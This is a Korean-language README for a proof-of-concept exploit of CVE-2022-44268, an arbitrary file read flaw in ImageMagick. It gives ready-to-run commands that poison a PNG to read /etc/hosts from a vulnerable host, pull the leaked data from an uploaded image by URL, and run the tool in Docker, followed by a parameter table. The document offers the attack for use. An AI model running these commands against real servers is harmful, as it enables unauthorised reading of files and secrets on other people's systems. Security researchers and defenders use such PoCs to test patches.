
CVE-2022-44268에 대한 개념 증명 익스플로잇으로, 취약한 ImageMagick 인스턴스에 업로드된 악성 PNG 이미지를 통해 임의 파일 읽기를 가능하게 합니다. Docker 지원 및 URL 기반 추출을 포함합니다.
CVE-2022-44268 ImageMagick 임의 파일 읽기 - 개념 증명 익스플로잇
이미지 오염 ☣️
python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.
익스플로잇 성공 여부 확인 🗡
python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png
빌드
docker build -t cve-2022-44268 .
실행
docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png
| 매개변수 | 설명 |
|---|
| 유형 |
|---|
| --url | 업로드된 PNG 이미지의 URL | 문자열 |
| --image | 입력 PNG 파일 | 파일 |
| --output | 출력 PNG 파일 | 파일 |
| --file-to-read | 취약한 호스트에서 읽을 파일 | 문자열 |